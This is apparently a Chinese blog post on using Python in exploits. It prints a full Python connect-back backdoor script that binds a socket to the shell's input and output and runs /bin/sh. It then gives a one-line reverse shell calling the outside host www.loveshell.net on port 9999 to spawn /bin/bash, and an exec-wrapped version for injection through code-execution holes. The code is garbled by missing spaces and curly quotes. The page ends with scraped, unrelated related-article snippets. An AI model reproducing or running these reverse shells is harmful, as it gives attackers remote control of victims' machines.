python如何执行代码漏洞_在漏洞利用Python代码真的很爽
不知道怎么忽然想看这个,呵呵
小我的python的反shell的代码
#!/usr/bin/python
#PythonConnect-backBackdoor
#Author:wofeiwowofeiwo[0x40]gmail[0x2e]com
#Version:1.0
#Date:July15th2006
importsys
importos
importsocket
shell=”/bin/sh”
defusage(programname):
print”PythonConnect-backBackdoor”
print”Auther:wofeiwowofeiwo[0x40]gmail[0x2e]com”
print”Date:July15th2006\n”
print”Usage:%sconn_back_hostport\n”%programname
defmain():
iflen(sys.argv)!=3:
usage(sys.argv[0])
sys.exit(1)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
print”[+]Connectok.”
except:
print”[-]Couldnotconnectto%s:%s”%(sys.argv[1],sys.argv[2])
sys.exit(2)
s.send(“——————–PythonConnect-backBackdoor——————–\n”)
s.send(“—————————–Bywofeiwo—————————–\n”)
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
globalshell
os.system(shell)
print”SeeU!”
s.close()
if__name__==”__main__”:main()
用在漏洞利用的时候不太好,不是么?我们想要短点的,节省下就是
importsys;importos;importsocket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((socket.gethostbyname(“www.loveshell.net”),9999));s.send(“Welcomemymaster\r\n”);os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);s.send(“Isthereashell?\r\n”);os.system(“/bin/bash”);s.close();s.send(“Seeunexttime!\r\n”);
如何?很短了吧?
不过很可能漏洞利用的地方不允许多语句,譬如允许的输入是在eval当中,不能多语句(后面有解释)那么还可以变化下
exec’importsys;importos;importsocket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((socket.gethostbyname(“www.loveshell.net”),9999));s.send(“Welcomemymaster\\r\\n”);os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);s.send(“Isthereashell?\\r\\n”);os.system(“/bin/bash”);s.close();s.send(“Seeunexttime!\\r\\n”);’;
注意是\\r\\n哦,即使在”里好象\r\n一样会成为换行,所以其实这里即使不用;一样可以构造好代码的,另外,为什么不用eval呢?
翻了下手册
exec语句用来执行储存在字符串或文件中的Python语句。例如,我们可以在运行时生成一个包含Python代码的字符串,然后使用exec语句执行这些语句
eval语句用来计算存储在字符串中的有效Python表达式
呵呵,这里用eval好象会出错.
YY一下,思想是相同的,但是具体到语言又是不一样的,如何跳出语言的限制呢?是个问题……
python如何执行代码漏洞_在漏洞利用Python代码真的很爽相关推荐
- python提取pdf的数字_详解利用python提取pdf文本数字
之前也不乏介绍过关于excel的内容,日常工作应用,除了excel,pdf也是经常使用的一种,关于pdf的文本提取,下面也来详细介绍~ 说明:从pdf文件中提取其他类型的数据,如文本或图像.将说明从p ...
- python批处理栅格转点_三种利用Python批量处理地理数据的方法——以栅格数据投影转换为例...
时至今日,笔者已经总结了三种用Python语言结合ArcGIS10.2提供的接口去批量处理地理数据的方法.即: 1. 用IDLE.Python Tools for Visual Studio等去编写独 ...
- 可转债代码交流第二期:利用Python获取集思录数据(改)
上期内容讲解了宁稳网数据获取的方法(用于初步计算未上市可转债价格),具体方法参考第一期:可转债代码交流第一期:利用Python获取宁稳网数据(包含基本的环境搭建与Python编辑器安装方法) 本人并非 ...
- rmi远程代码执行漏洞_【漏洞通告】Apache Solr远程代码执行漏洞
1.综述 Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器.该产品支持层面搜索.垂直搜索.高亮显示搜索结果等. Apache Solr ...
- android fastjson漏洞_【漏洞预警】Fastjson 远程代码执行漏洞(暂无PoC)
Fastjson简介 Fastjson是一个Java语言编写的高性能功能完善的JSON库.它采用一种"假定有序快速匹配"的算法,把JSON Parse的性能提升到极致,是目前Jav ...
- unicode 编码转换漏洞_好程序员Python教程之字符串编码知识小结
好程序员Python教程之字符串编码知识小结,提及Python字符串,你会想到什么?是ASCII,还是Unicode?他们之间是如何转换的?字符串编码和字符串有什么区别?接下来好程序员Python教程 ...
- python考试代码复制_笨办法学Python 习题 26: 恭喜你,现在可以考试了! 错误代码下载链接...
你已经差不多完成这本书的前半部分了,不过后半部分才是更有趣的.你将学到逻辑,并通过条件判断实现有用的功能. 在你继续学习之前,你有一道试题要做.这道试题很难,因为它需要你修正别人写的代码.当你成为程序 ...
- 受诫礼漏洞_硬件漏洞,您如何才能正确地做所有事情并仍然受到损害
受诫礼漏洞 In the first week of 2018, Meltdown and Spectre were publicly disclosed. The news of these vul ...
- fastjson反序列化漏洞_【漏洞复现】fastjson反序列化漏洞
0x00 影响版本 fastjson< 1.2.48 0x01 漏洞原理 Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON ...
- hadoop漏洞_【漏洞公告】CVE-2017-7669:Apache Hadoop远程权限提升漏洞
Apache Hadoop是支持数据密集型分布式应用,并以Apache 2.0许可协议发布的软件框架.近期,国外安全研究人员发现,在Apache Hadoop 2.8.0版本.3.0.0-alpha1 ...
最新文章
- 自定义HTTP标头:命名约定
- python numpy加速 cupy
- pyqt5界面与逻辑分离--信号槽的装饰器实现方式
- 一次问卷产品的MVP设计
- 特征点提取之Harris角点提取法
- 多线程 调用多线程的方法 Runtime与ProcessBuilder
- JDK 11:Java序列化的终结开始了吗?
- 结构专业规范大全_1.2万篇 建筑行业规范大全套!速来!
- sample等价是什么错误_一个复制粘贴引发的有趣小错误及思考
- linux离线安装mysql8
- 深度学习——loss函数的学习笔记(legacy)
- 计算机二级c语言选择题pdf,计算机二级c语言选择题库(带答案)[汇编].pdf
- mac如何安装svn
- LogViewer-Unity日志的插件
- Typora设置图片的题注(标题)
- 硬件管理 远程开机,网络开机
- Consumer is not subscribed to any topics or assigned any partitions
- 学习uc/os-ii
- 微软ad域服务器 管理用户,威联通NAS助企业解决Windows AD域账户管理
- 增强学习系列之(二):实现一个简单的增强学习的例子
热门文章
- AGC022E Median Replace
- ssh: connect to host gitee.com port 22: Connection timed out fatal: Could not read from remote repos
- MongoDB学习(黑马教程)-2-数据库MongoDB的导入文档和查询文档的操作
- Pod--初始化容器
- python 散点图点击链接图片_Python数据可视化——散点图
- python定义复数矩阵_python矩阵运算,转置,逆运算,共轭矩阵实例
- mysql异构迁移_如何利用数据异构实现多级缓存和数据迁移
- vue添加定位功能_vue 实现Web端的定位功能 获取经纬度
- python 字典写入excel_Python向excel中写入数据的方法
- CMU 15-213 Introduction to Computer Systems学习笔记(4) Machine-Level Programming-Basic